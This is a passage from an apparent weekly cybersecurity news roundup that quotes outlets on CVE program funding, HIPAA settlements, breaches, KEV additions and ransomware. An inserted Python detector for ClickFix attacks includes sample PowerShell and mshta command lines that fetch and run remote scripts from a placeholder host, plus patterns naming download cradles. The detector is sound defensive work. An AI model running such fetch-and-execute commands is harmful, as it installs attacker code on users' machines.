    • “DARPA’s statements came in the context of the AI Cyber Challenge, a public-private collaboration involving industry leaders such as Google, Microsoft, Anthropic and OpenAI. The initiative tests whether advanced AI systems can identify and patch vulnerabilities in open-source software components vital to the electric grid, health care, and transportation.”
  • and
    • “Cryptography experts say the race to fend off future quantum-computer attacks has entered a decisive but measured phase, with companies quietly replacing the internet plumbing that the majority of the industry once considered unbreakable.
    • “Speaking at Cloudflare’s Trust Forward Summit on Wednesday, encryption leaders at IBM Research, Amazon Web Services and Cloudflare outlined how organizations are refitting cryptographic tools that safeguard online banking, medical data and government communications. The aim is to stay ahead of quantum machines that, once powerful enough, could decode the math protecting today’s digital traffic.
    • “Over the next five to 10 years you’re going to see a Cambrian explosion of different cryptographic systems,” said Wesley Evans, a product manager for Cloudflare’s research team, referring to an evolutionary period with a rapid diversification of animal life that occurred roughly 540 million years ago.” 
  • Dark Reading adds,
    • “Each year, top SANS faculty joins the RSAC conference to present what their community of practitioners and researchers see as the most pressing challenges facing the cybersecurity community for the year to come. This year’s list of top-five threats aren’t merely technical, and tackling them will demand coordinated leadership from the very top of the organization and beyond.
    • “The attack techniques outlined in the SANS RSAC 2025 keynote underscore a common theme: Cybersecurity is no longer confined to the security operations center — it’s a leadership issue that impacts every layer of the enterprise,” according to a SANS media statement. “The threats of tomorrow demand a strategic, integrated response rooted in visibility, agility, and cross-functional alignment.”
  • Bleeping Computer notes,
    • “Microsoft has announced that all new Microsoft accounts will be “passwordless by default” to secure them against password attacks such as phishing, brute force, and credential stuffing.
    • “The announcement comes after the company started rolling out updated sign-in and sign-up user experience (UX) flows for web and mobile apps in March, optimized for passwordless and passkey-first authentication.
    • “As part of this simplified UX, we’re changing the default behavior for new accounts. Brand new Microsoft accounts will now be ‘passwordless by default’,” said Joy Chik, Microsoft’s President for Identity & Network Access, and Vasu Jakkal, Corporate Vice President for Microsoft Security.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • Cyberscoop reports,
    • “The Cybersecurity and Infrastructure Security Agency will soon have a new second-in-command.
    • “Madhu Gottumukkala has been named deputy director. He comes over to CISA from his prior position in the South Dakota government, where Kristi Noem was most recently governor before taking over as secretary of the Department of Homeland Security. Gottumukkala had been commissioner of the Bureau of Information and Telecommunication (BIT) and state chief information officer.
    • “He’ll leave BIT on May 16. A CISA spokesperson confirmed that Gottumukkala would become deputy director of the agency.”
  • CISA gives us the results of the President’s Cup competition and also announced on April 23,
    • “The [Common Vulnerabilities and Exposures] CVE Program is an invaluable public resource relied upon by network defenders and software developers alike. As the nation’s cyber defense agency, it is a foundational priority for CISA. Recent public reporting inaccurately implied the program was at risk due to a lack of funding. To set the record straight, there was no funding issue, but rather a contract administration issue that was resolved prior to a contract lapse. There has been no interruption to the CVE program and CISA is fully committed to sustaining and improving this critical cyber infrastructure.
    • “CISA is proud to be the sponsor for the CVE program, a role we have held for decades. During this time, the CVE Program has gone through many evolutions, and this opportunity is no exception. MITRE, CISA, and the CVE Board have transformed this program into a federated capability with 453 CVE Numbering Authorities (CNAs). This growth has enabled faster and more distributed CVE identification, providing valuable vulnerability information to the public and enabling defenders to take quick action to protect themselves. We have historically been and remain very open to reevaluating the strategy to support the continued efficacy and value of the program.
    • “We also recognize that significant work lies ahead. CISA, in coordination with MITRE and the CVE Board, is committed to actively seeking and incorporating community feedback into our stewardship of the CVE Program. We are committed to fostering inclusivity, active participation, and meaningful collaboration between the private sector and international governments to deliver the requisite stability and innovation to the CVE Program. And we are committed to achieving these goals together.”
  • Bleeping Computer tells us,
    • “The FBI has asked the public for information on Chinese Salt Typhoon hackers behind widespread breaches of telecommunications providers in the United States and worldwide.
    • “In October, the FBI and CISA confirmed that the Chinese state hackers had breached multiple telecom providers (including AT&T, Verizon, Lumen, Charter Communications, Consolidated Communications, and Windstream) and many other telecom companies in dozens of countries.
    • “As revealed at the time, while they had access to the U.S. telecoms’ networks, the attackers also accessed the U.S. law enforcement’s wiretapping platform and gained access to the “private communications” of a “limited number” of U.S. government officials.”
  • The HHS Office for Civil Rights announced,
    • “Today [April 25], the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with Comprehensive Neurology, PC (Comprehensive), a small New York neurology practice, concerning a potential violation of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Security Rule. The settlement resolves an OCR investigation of a [2020] ransomware attack against Comprehensive.” * * *
    • “Under the terms of the settlement, Comprehensive agreed to implement a corrective action plan that will be monitored by OCR for two years and paid $25,000 to OCR.”
    • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/sites/default/files/ocr-hipaa-racap-np.pdf [PDF, 245 KB].”
  • and
    • “Today [April 23], the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with PIH Health, Inc. (PIH), a California health care network, over potential violations of the Health Insurance Portability and Accountability Act of 1996 (HIPAA). The violations stem from a phishing attack that exposed unsecured electronic protected health information (ePHI), prompting concerns related to the Privacy, Security, and Breach Notification Rules under HIPAA.” * * *
    • “The settlement resolves an investigation that OCR conducted after receiving a breach report from PIH in January 2020. The breach report stated that in June 2019, a phishing attack compromised forty-five of its employees’ email accounts, resulting in the breach of 189,763 individuals’ unsecured ePHI. PIH reported that the ePHI disclosed in the phishing attack included affected individuals’ names, addresses, dates of birth, driver’s license numbers, Social Security numbers, diagnoses, lab results, medications, treatment and claims information, and financial information.”
    • “Under the terms of the resolution agreement, PIH has agreed to implement a corrective action plan that will be monitored by OCR for two years and paid a $600,000 settlement to OCR.” * * *
    • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/hipaa/for-professionals/compliance-enforcement/agreements/index.html.”

Three important reports were released this week.

  • Per Cyberscoop,
    • “It looks like 2024 was a record year in cybercrime for all the wrong reasons, according to the FBI’s annual Internet Crime Complaint Center (IC3) report released Wednesday. 
    • “As cyber-enabled fraud and ransomware continue to harm individuals, businesses, and critical infrastructure, the report, now in its 25th year, provides crucial insight into evolving criminal tactics and their nationwide impact. The report is overflowing with key trends, case data, and other statistics from the FBI’s ongoing efforts to combat the cyberthreat landscape.”
  • and
    • “Cybercriminals and state-sponsored threat groups exploited vulnerabilities and initiated ransomware attacks with vigor last year, escalating the scope of their impact by hitting more victims and outmaneuvering defenses with speed.
    • “The rate of ransomware detected in data breaches jumped 37%, occurring in 44% of the 12,195 data breaches reviewed in Verizon’s 2025 Data Breach Investigations Report released Wednesday. Researchers observed the presence of ransomware in 32% of data breaches in last year’s report. 
    • “Verizon’s research underscores the twists and turns of cybercriminal activity and its wide-reaching impact on organizations. “We see less payment activity,” Alex Pinto, associate director of threat intelligence at Verizon Business, told CyberScoop, “but we don’t see it slowing down.”
  • Per Cybersecurity Dive,
    • “Threat actors motivated by financial gain continue to rise in prominence, representing 55% of all cyber actors during 2024, according to a report by Mandiant. The figures show a steady increase from 52% in 2023 and 48% in 2022. 
    • “Exploits remained the most common initial access vector for the fifth consecutive year, representing 33% of exploits overall, according to the Mandiant M-Trends 2025 report. However, stolen credentials became the second most common initial access point for the first time, indicating a rising trend.
    • “Cyber threat groups are increasingly targeting unsecured data repositories as poor security hygiene continues to leave organizations at risk.”

From the cyber vulnerabilities and breaches front,

  • Healthcare Dive reports,
    • “A data breach at Yale New Haven Health has exposed the information of about 5.6 million people, according to a report submitted to federal regulators earlier this month.
    • “The Connecticut-based health system detected unusual activity on its IT systems in early March, Yale New Haven said in a press release. An investigation later found an unauthorized third party had gained access to its network and stole copies of some patient data. 
    • “The incident is the largest healthcare breach reported to federal regulators so far in 2025, according to a portal managed by the HHS’ Office of Civil Rights.”
  • and
    • “A data breach at Blue Shield of California exposed information from 4.7 million people, according to a notice filed with federal regulators earlier this month. 
    • “In February, the insurer learned that Google Analytics, a vendor Blue Shield employs to track use of its websites, was sharing member data with the advertising service Google Ads from April 2021 through January 2024, according to a breach notice. 
    • “Blue Shield can’t confirm whether any particular beneficiary’s information is affected due to “the complexity and scope of the disclosures,” so the insurer is notifying all members who could have accessed their information on affected websites during the nearly three-year period.” 
  • Cybersecurity Dive tells us,
    • “Conduent Inc. warned in an April 14 regulatory filing with the Securities and Exchange Commission that a “significant” number of people had their personal data stolen in a January cyberattack that affected a limited number of the company’s clients.
    • “The company, a major government payments technology vendor for social services and transit systems, was targeted in a Jan. 13 attack that disrupted certain operations. 
    • “The company warned it has incurred and accrued a material amount of nonrecurring expenses related to the breach. A spokesperson for the company did not have specific numbers yet, but a breach notification has already been posted by the California Attorney General’s office.”
  • and
    • Threat groups from across the globe are increasingly weaponizing older vulnerabilities for exploitation, according to a report released Wednesday by GreyNoise Intelligence.
    • More than half of these resurgent vulnerabilities affect edge technologies, the report shows. Nearly seven out of 10 of the most unpredictable vulnerabilities — known as Black Swan vulnerabilities — affect edge technologies.
    • Almost 40% of Black Swan vulnerabilities specifically affect VPNs and routers, according to the report.
  • Per Cyberscoop,
    • “Attackers exploited nearly a third of vulnerabilities within a day of CVE disclosure in the first quarter of 2025, VulnCheck said in a report released Thursday. The company, which focuses on vulnerability threat intelligence, identified 159 actively exploited vulnerabilities from 50 sources during the quarter.
    • “The time from CVE disclosure to evidence of exploitation in the first quarter was marginally faster than what VulnCheck observed during 2024, Patrick Garrity, security researcher at the company, said in the report. “This demonstrates the need for defenders to move fast on emerging threats while continuing to burn down their vulnerability debt,” Garrity wrote. 
    • “VulnCheck’s research reinforces multiple recent reports that warned about increased exploits in 2024. Mandiant said exploits were the most common initial infection vector last year, representing 1 of every 3 attacks. Verizon reported a 34% increase in exploited vulnerabilities, and IBM X-Force said exploitation of public-facing applications accounted for 30% of incident response cases last year.”
  • and
    • “Attackers are having a field day with software defects in security devices, according to a new report released Wednesday by Mandiant. 
    • “Exploits were the most common initial infection vector, representing 1 of every 3 attacks in 2024, and the four most frequently exploited vulnerabilities were all contained in edge devices, such as VPNs, firewalls and routers, Mandiant said in its M-Trends report released Wednesday.
    • “Exploitation of these vulnerabilities represented slightly less than half of all observed vulnerability exploitation,” said Kirstie Failey, principal threat analyst at Google Threat Intelligence Group, under which the Mandiant brand operates.
    • “Threat researchers and federal cyber authorities have been sounding the alarm about attacks targeting network edge devices for more than a year. Since 2024, security device exploits have resulted in attacks on government agencies and some of the most valuable publicly-traded companies in the world.”
  • Per Cybersecurity Dive,
    • “Security researchers warn that hackers are actively exploiting a critical unrestricted-file-upload vulnerability in SAP NetWeaver Visual Composer. 
    • “The vulnerability, tracked as CVE-2025-31324, could allow an unauthenticated user to upload malicious executable binaries. The vulnerability has a severity score of 10.  
    • “Researchers from Reliaquest disclosed the vulnerability to SAP after an investigation uncovered attackers uploading JSP webshells into publicly accessible directories.” 
  • FEHBlog note: CISA did not add a known exploited vulnerability to its catalog this week.

From the ransomware front,

  • Palo Alto Networks issued a report on extortion and ransomware trends in the first quarter of 2025.
  • Dark Reading reports,
    • “The ransomware-as-a-service model is perpetually troubling for dropping the barrier to entry for aspiring ransomware actors, and two threat actors are innovating in the space with additional affiliate models.
    • “Extended detection and response vendor Secureworks (owned by Sophos) published research today detailing expanded affiliate models belonging to ransomware-as-a-service (RaaS) gangs DragonForce and Anubis.
    • “As a model, ransomware-as-a-service (RaaS) has gained significant popularity in recent years. A threat actor typically sells or leases many of the tools a less experienced cybercriminal (or affiliate) would need to conduct a ransomware attack; the affiliate typically shares the proceeds from subsequent attacks with the operator.
    • “The RaaS model has significantly lowered the technical barriers for wannabe cybercriminals, and as such it has become a serious problem for organizations around the world.”
  • Infosecurity Magazine notes,
    • “A new ransomware strain known as ELENOR-corp, identified as version 7.5 of the Mimic ransomware, has been used in a series of targeted attacks on the healthcare sector.
    • “The campaign displays a range of advanced capabilities, including data exfiltration, persistent access and anti-forensic strategies designed to cripple recovery efforts and maximize damage.”

From the cybersecurity defenses front,

  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity renewals, policy and law enforcement front,

  • Federal News Network reported on Tuesday,
    • “The Cybersecurity and Infrastructure Security Agency [CISA] has inked a last-minute funding extension for a key cyber vulnerability management program.
    • CISA’s contract with MITRE to manage the Common Vulnerabilities and Exposures, or CVE, program was set to expire on Wednesday. But after an outcry from the cybersecurity community, CISA executed an 11-month option period for MITRE’s contract on Tuesday night.
    • “The CVE program is invaluable to the cyber community and a priority of CISA,” a CISA spokesperson said on Wednesday. “Last night, CISA executed the option period on the contract to ensure there will be no lapse in critical CVE services. We appreciate our partners’ and stakeholders’ patience.”
    • The CVE program is a public database of known security vulnerabilities in software and hardware. It’s relied on by organizations across the world to manage cyber vulnerabilities in products and services. CISA’s “Known Exploited Vulnerabilities” database, for instance, relies on CVEs to prioritize how quickly federal agencies must patch bugs on the list.
  • Cybersecurity Dive adds,
    • “Two federal lawmakers today introduced a bipartisan bill that preserves key regulation that facilitates the sharing of cyber-threat data between private companies and the federal government. 
    • “The Cybersecurity Information Sharing Extension Act, introduced by U.S. Sens. Gary Peters (D-MI) and Mike Rounds (R-SD), would extend provisions of the Cybersecurity Information Sharing Act of 2015, which is due to expire in September. The law encourages businesses to share information about ongoing cybersecurity threats with the federal government and is one of few legislative actions that has actually had an impact on real-world cybersecurity, security experts said.
    • “Specifically, the Cybersecurity Information Sharing Act of 2015 gives incentives to companies to voluntarily share cybersecurity threat indicators, such as software vulnerabilities, malware or malicious IP addresses, with the Department of Homeland Security (DHS). It does this by providing legal protections for companies that do so by providing federal antitrust exemptions and precluding them from being held accountable for state and federal disclosure laws.”
  • CISA announced,
    • “Cyber threats across the globe have put into focus our country’s need for cyber talent. CISA leads and hosts the President’s Cup Cybersecurity Competition to identify, recognize, and reward the best cyber talent across the federal workforce. Participants are challenged to outthink and outwit their competitors in a series of tests designed to expand cyber skills that are based on real-world situations.  For President’s Cup 6, participants will compete in a maximum velocity metaverse full of mayhem and taking place in a world light years ahead of our own.  
    • “Want to see what it’s like to participate in the President’s Cup? Federal employees can visit the President’s Cup Practice Area to take on challenges from previous competitions and receive a certificate of completion. Anyone can visit the President’s Cup GitHub page to find descriptions, solution guides, virtual machine builds and other artifacts from challenges featured in previous President’s Cup competitions.”
  • The National Institute of Standards and Technology (NIST) let us know,
    • “A draft update to the NIST Privacy Framework will enable organizations to use it seamlessly with the agency’s Cybersecurity Framework, which received its own update last year. 
    • “Targeted changes to content and structure respond to stakeholder needs and make the document easier to use.”
    • “NIST is accepting public comments on the draft via [email protected] until June 13, 2025. A template for submitting comments can be found at the NIST Privacy Framework website. Following the comment period, NIST will consider additional changes and release a final version later this calendar year.”
  • The HHS Office for Civil Rights announced on April 17,
    • “Today, the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with Guam Memorial Hospital Authority (GMHA), a public hospital on the U.S. Territory, island of Guam, concerning a potential violation of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Security Rule, following the receipt of two complaints alleging that the electronic protected health information (ePHI) of GMHA patients was impermissibly disclosed.” * * *
    • “Ransomware and hacking are the primary cyber-threats to electronic protected health information within the health care industry. Failure to conduct a HIPAA risk analysis puts this information at risk and vulnerable to future ransomware attacks and other cyber-threats,” said OCR Acting Director Anthony Archeval.
    • “Under the terms of the resolution agreement, GMHA agreed to implement a corrective action plan that will be monitored by OCR for three years, and paid OCR $25,000.” * * *
    • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/sites/default/files/ocr-hipaa-recap-gmha.pdf [PDF, 228 KB].”
  • Per Bleeping Computer,
    • “The FBI warns that scammers impersonating FBI Internet Crime Complaint Center (IC3) employees offer to “help” fraud victims recover money lost to other scammers.
    • “Over the last two years, between December 2023 and February 2025, the FBI said it has received over 100 reports of fraudsters using this tactic.
    • “Complainants report initial contact from the scammers can vary. Some individuals received an email or a phone call, while others were approached via social media or forums,” the law enforcement agency warned in a Friday public service announcement.”

From the cybersecurity vulnerabilities and breaches front,

  • Cyberscoop reports,
    • “A House panel has concluded that the U.S. government should double down on export controls and other tools to slow down the progress of Chinese AI companies like DeepSeek, while also preparing for a future where those efforts fail.
    • “In a report released Wednesday, the House Select Committee on the Chinese Communist Party further fleshes out the financial and technological resources that went into building DeepSeek’s R1 reasoning model, as well as its potential risks to U.S. economic and national security.
    • “The authors conclude that the DeepSeek website and app “acts as a direct channel for foreign intelligence gathering on Americans’ private data.”
  • Dark Reading adds,
    • “One of China’s major state-funded espionage groups has created or otherwise upgraded various malware programs, signaling a notable arsenal refresh that defenders need to be aware of.
    • “Mustang Panda (aka Bronze President, Stately Taurus, and TA416) is an advanced persistent threat (APT) believed to be sponsored by the People’s Republic of China (PRC). It has long been known for spying on targets of interest to the PRC, including: military and government organizations, nongovernmental organizations (NGOs), think tanks, minority groups, and corporations in major industries, primarily around East and Southeast Asia but also in the West.
    • “Recently, the group attacked an organization based in Myanmar. In the process, researchers from Zscaler uncovered four previously unknown attack tools the group is now using. They include two keyloggers, a tool for facilitating lateral movement, and a driver used to evade endpoint detection and response (EDR) software. Besides that, the group has also upgraded its signature backdoor, “Toneshell.”
  • Per Cybersecurity Dive,
    • “Lemonade Inc. has begun sending notification letters to about 190,000 people after their driver’s license numbers were transmitted unencrypted, according to regulatory filings by the company. 
    • “The company said a technical issue in its online application process for car insurance led to the exposure of data in an application programming interface call to a third-party data provider, according to an April 9 filing with the Securities and Exchange Commission.
    • “As part of the online application process, certain information is sent between a server and a user’s browser, according to the filing. This includes data used to generate an insurance quote.  
    • “Lemonade said it learned of the issue on March 14 and said the exposures likely lasted from April 2023 through March 2024, according to a notice filed with the California Attorney General’s office.”
  • and
    • “Hertz Corp. confirmed a threat actor gained access to sensitive personal data in a breach linked to vulnerabilities in Cleo file-transfer software, according to a filing Friday with the Maine Attorney General’s office. 
    • “Hertz said it learned on Feb. 10 that an unauthorized third party obtained the data in connection with an attack spree that took place between October and December 2024. Hertz completed an analysis of the stolen data on April 2. 
    • “Importantly, to date, our investigation has found no evidence that Hertz’s own network was affected by this event,” a Hertz spokesperson said via email. 
  • CISA added four known exploited vulnerabilities to its catalog this week.
  • April 16, 2025
    • CVE-2021-20035 SonicWall SMA100 Appliances OS Command Injection Vulnerability
      • Cybersecurity Dive discusses this KEV here.
  • April 17, 2025
    • CVE-2025-31200 Apple Multiple Products Memory Corruption Vulnerability
    • CVE-2025-31201 Apple Multiple Products Arbitrary Read and Write Vulnerability
    • CVE-2025-24054 Microsoft Windows NTLM Hash Disclosure Spoofing Vulnerability
      • Dark Reading discusses the Apple KEVs here.
      • Hacker News discusses the Microsoft KEV here.
  • Cybersecurity Dive adds,
    • “Huntress on Monday published research that showed exploitation of CVE-2025-30406, a deserialization vulnerability in Gladinet’s CentreStack enterprise file-sharing platform for managed service providers (MSPs). The cybersecurity vendor said seven organizations were compromised via the zero-day flaw, which involves a hardcoded cryptographic key that can be used to gain remote code execution.
    • “Huntress warned that Gladinet’s Triofox product also relies on a hardcoded key and is vulnerable to CVE-2025-30406. Triofox is an on-premises file-sharing server designed for larger enterprises, according to Gladinet.
    • CISA added CVE-2025-30406 to its known exploited vulnerabilities catalog on April 9. Gladinet first disclosed the flaw on April 3 and warned that exploitation had already been observed in the wild.”

From the ransomware front,

  • Cybersecurity Dive reports,
    • “DaVita has been hit by a ransomware attack that’s affecting operations, the kidney care provider said Monday. 
    • “The dialysis company discovered the attack, which encrypted parts of its network, on Saturday, according to a securities filing. DaVita then activated its response plans and isolated affected systems.
    • “The company did not disclose how its operations are being affected or how long the disruption will last, but said patient care is continuing.” 
  • and
    • “Ahold Delhaize confirmed Thursday that certain files from its U.S. operations were stolen in a November cyberattack after a threat group claimed credit for the incident.
    • “The threat group, tracked as Inc Ransom, claimed in a Wednesday post on its leak site to have up to 6 TB of sensitive data from the Netherlands-based supermarket operator’s U.S. division and threatened to release the information if its demands are not met, according to researchers at Arctic Wolf. The attackers have not said what those demands are.
    • “Since the incident was detected, our teams have been working diligently to determine what information may have been affected,” Ahold Delhaize USA said in a statement.”
  • Per Security Week,
    • “The Oregon Department of Environmental Quality (DEQ) is the regulatory agency in charge of the quality of air, land and water in the state. The organization revealed on April 9 that it had launched an investigation into a cyberattack that forced it to shut down networks as part of containment efforts.
    • “The DEQ has been issuing updates every day since, and several of the updates pointed out that the agency had found no evidence of a data breach. 
    • “The incident disrupted email and help desk services, as well as vehicle inspection stations. The agency said its environmental data management system is hosted on a separate server and has not been impacted.
    • “After the regulator’s repeated denials about suffering a data breach, the notorious Rhysida ransomware group took credit for the attack on Monday, claiming to have stolen 2.5 Tb of files, including employee data.” 
  • Bleeping Computer points out,
    • “The Interlock ransomware gang now uses ClickFix attacks that impersonate IT tools to breach corporate networks and deploy file-encrypting malware on devices.
    • “ClickFix is a social engineering tactic where victims are tricked into executing dangerous PowerShell commands on their systems to supposedly fix an error or verify themselves, resulting in the installation of malware.
    • “Though this isn’t the first time ClickFix has been linked to ransomware infections, confirmation about Interlock shows an increasing trend in these types of threat actors utilizing the tactic.
    • “Interlock is a ransomware operation launched in late September 2024, targeting FreeBSD servers and Windows systems.
    • “Interlock is not believed to operate as a ransomware-as-a-service model. Still, it maintains a data leak portal on the dark web to increase pressure on victims, demanding payments ranging from hundreds of thousands of dollars to millions.”
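As an added example, not code from the Bleeping Computer article or from any published Interlock analysis, the following Python routine shows one way a defender can triage process-creation telemetry for the ClickFix pattern described above: a user pasting an attacker-supplied command into the Run dialog or a console, so that PowerShell, cmd or mshta starts under explorer.exe with a hidden window, an encoded command, an execution-policy bypass or a download cradle. The field names mirror Sysmon Event ID 1 (Image, ParentImage, CommandLine), but the records, the indicator weights and the alert threshold are all constructed for this example and are not a published detection scheme.

```python
"""Score process-creation events for ClickFix-style interactive PowerShell launches.

Added example: records, weights and threshold are constructed assumptions,
not telemetry or rules from the article. Field names follow Sysmon Event ID 1.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Interpreters a pasted "fix this error" command typically runs through.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# A parent of explorer.exe means a human (or a fake dialog) launched it
# interactively, as opposed to a scheduled task or a management agent.
INTERACTIVE_PARENTS = {"explorer.exe"}
INTERACTIVE_WEIGHT = 2
THRESHOLD = 4  # assumption: tune against your own baseline of admin activity

# (name, pattern over the command line, weight). Weights are assumptions.
INDICATORS = [
    ("encoded_command", re.compile(r"-e(?:nc(?:odedcommand)?)?(?=\s)", re.I), 3),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("bypass_policy", re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), 2),
    ("download_cradle", re.compile(
        r"\b(?:iex|invoke-expression|invoke-webrequest|iwr|downloadstring|curl)\b", re.I), 3),
    ("clipboard_read", re.compile(r"\bget-clipboard\b", re.I), 2),
    ("mshta_remote", re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I), 3),
]


@dataclass
class ProcessEvent:
    image: str
    parent_image: str
    command_line: str
    user: str


@dataclass
class Finding:
    event: ProcessEvent
    score: int
    reasons: List[str] = field(default_factory=list)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcessEvent, threshold: int = THRESHOLD) -> Optional[Finding]:
    """Return a Finding when the event's weighted indicators reach the threshold."""
    if _basename(ev.image) not in INTERPRETERS:
        return None
    score, reasons = 0, []
    if _basename(ev.parent_image) in INTERACTIVE_PARENTS:
        score += INTERACTIVE_WEIGHT
        reasons.append("interactive_parent")
    for name, pattern, weight in INDICATORS:
        if pattern.search(ev.command_line):
            score += weight
            reasons.append(name)
    return Finding(ev, score, reasons) if score >= threshold else None


def triage(events: List[ProcessEvent]) -> List[Finding]:
    """Events that crossed the threshold, in input order."""
    return [f for f in (score_event(e) for e in events) if f is not None]


# Constructed sample records (hosts, users and URLs are placeholders).
_ENCODED = base64.b64encode("Get-Date".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    # 1: pasted "verification" one-liner from the Run dialog -> flagged
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 "powershell -w hidden -ep bypass -c \"iex (iwr 'http://example.invalid/verify.ps1')\"",
                 "CORP\\jdoe"),
    # 2: remote HTA launched interactively -> flagged
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                 "mshta https://example.invalid/captcha.hta", "CORP\\jdoe"),
    # 3: scheduled inventory script, no indicators -> not flagged
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\svchost.exe",
                 r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1",
                 "NT AUTHORITY\\SYSTEM"),
    # 4: user simply opened a console -> not flagged
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe", "powershell.exe", "CORP\\jdoe"),
    # 5: management agent using -EncodedCommand; below threshold on its own
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\CCM\CcmExec.exe",
                 f"powershell.exe -NonInteractive -EncodedCommand {_ENCODED}",
                 "NT AUTHORITY\\SYSTEM"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"score={finding.score} user={finding.event.user} "
              f"reasons={','.join(finding.reasons)} cmd={finding.event.command_line}")
```

Event 5 is deliberately left below the threshold: encoded commands from a management agent are routine in many estates, and the point of weighting the interactive parent separately is that the same command line pasted by a user under explorer.exe would score high enough to alert.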
  • The Register adds,
    • “Ransomware operators jack up their ransom demands by a factor of 2.8x if they detect a victim has cyber-insurance, a study highlighted by the Netherlands government has confirmed.
    • “For his PhD thesis [PDF], defended in January, Dutch cop Tom Meurs looked at 453 ransomware attacks between 2019 and 2021. He found one of the first actions intruders take is to search for documents with the keywords “insurance” and “policy.” If the crooks find evidence that the target has a relevant policy, the ransom more than doubles on average.
    • “In double-extortion attacks, where intruders threaten to publish data stolen from the victim unless the ransom is paid, those with insurance on average are quoted 5.5x more than those who don’t.” * * *
    • “According to the research, firms with a proper backup system were 27x less likely to pay criminals off, for the simple reason that they usually don’t need to. Even then, surprisingly, some do.
    • “In roughly 5 out of 100 cases in which a payment is made, victims do have the option to recover in a way other than paying, but they still choose to pay – for example to recover faster or to prevent reputational damage,” he said.
    • “In the remaining 95 cases, there is no other option to recover. In those cases, their entire IT infrastructure is broken and can no longer be repaired, making paying the ransom the only option to avoid bankruptcy.”

From the cybersecurity defenses front,

  • The American Hospital Association News tells us,
    • “The Cybersecurity and Infrastructure Security Agency April 17 released guidance to reduce risks associated with a reported breach of Oracle cloud services. CISA said the scope and impact of the breach is unconfirmed and that credentials may be exposed that could be reused across unaffiliated systems or embedded. The guidance lists recommendations for organizations and individual users to mitigate the risk of potential compromise. 
    • “This alert not only contains practical guidance to mitigate the potential breach related to Oracle but also provides valuable guidance and best practices for general cloud security,” said John Riggi, AHA national advisor for cybersecurity and risk. “Generally speaking, we continue to see that most of the cyber risk exposure that hospitals and health systems face originates from insecure third-party technologies, service providers and the supply chain. It is vitally important for mission-critical third parties to share timely threat intelligence and adversary tactics with the federal government and affected clients. This is necessary to prevent potential cyberattacks, which could compromise sensitive data and risk patient safety.” 
  • Dark Reading asks “Are We Prioritizing the Wrong Security Metrics? True security isn’t about meeting deadlines — it’s about mitigating risk in a way that aligns with business objectives while protecting against real-world threats.”
  • Cyberscoop considers whether “Ivanti is the problem or a symptom of a systemic issue with network devices? Exploited vulnerabilities have turned up in Ivanti products 16 times since 2024. That’s more than any other vendor in the network edge device space.”
  • Bleeping Computer suggests “7 Steps to Take After a Credential-Based cyberattack.”
    • “When credentials fall into the wrong hands and hackers breach your systems, every minute counts — but having a well-rehearsed incident response plan will allow you to minimize damage and recovery time.”
  • Here is a link to Dark Reading’s CISO corner.


From the cybersecurity policy and law enforcement front,

  • Federal News Network tells us,
    • “The second Trump administration’s cybersecurity policy is still coming into view, but GOP lawmakers are calling for the White House to kick off a review of existing and future cyber regulations.
    • “Lawmakers and policy experts are particularly focused on three key rules: the Cybersecurity and Infrastructure Security Agency’s incident reporting requirements; the Department of Health and Human Services’ proposed update to health care security requirements; and the Securities and Exchange Commission’s 2023 cybersecurity risk management requirements.”
  • FEHBlog note — As early as April 21, federal agencies will be announcing the withdrawal of certain proposed rules, such as the HIPAA Security Rule amendments, which stripped the rule of its most important feature — flexibility, and the repeal of certain final rules under a February 19, 2025, executive order which a Presidential memorandum supplemented last Wednesday.
  • The American Hospital Association News explained on April 10,
    • The Trump administration yesterday released executive orders on reducing anti-competitive regulatory barriers and repealing certain regulations deemed unlawful.  
    • The order on reducing anti-competitive barriers directs federal agencies to review all regulations subject to their rulemaking authority and identify those that create de facto or de jure monopolies, create barriers to entry for new market participants, create or facilitate licensure or accreditation requirements that unduly limit competition, or otherwise impose anti-competitive restraints or distortions in the market.   
    • The order on repealing unlawful regulations is linked to a Feb. [19] executive order [published in the Federal Register on Feb. 25] that directed agencies within 60 days to identify unlawful and potentially unlawful regulations to be repealed. The new order instructs agencies to take steps to immediately repeal regulations and provide justification within 30 days for any identified as unlawful but have not been targeted for repeal, explaining the basis for the decision not to repeal.
  • The Mintz law firm points out that on April 7, 2025, OMB issued new guidance for the Federal Government’s use of artificial intelligence (AI), and President Trump signed an EO for AI Data Centers.
  • Security Week reports,
    • The National Institute of Standards and Technology (NIST) has announced that all CVEs published before January 1, 2018, will be marked as ‘Deferred’ in the National Vulnerability Database (NVD).
    • This means that, because the CVEs are old, NIST will no longer prioritize updating NVD enrichment or initial NVD enrichment data for them, unless they are or have been included in CISA’s Known Exploited Vulnerabilities (KEV) catalog.
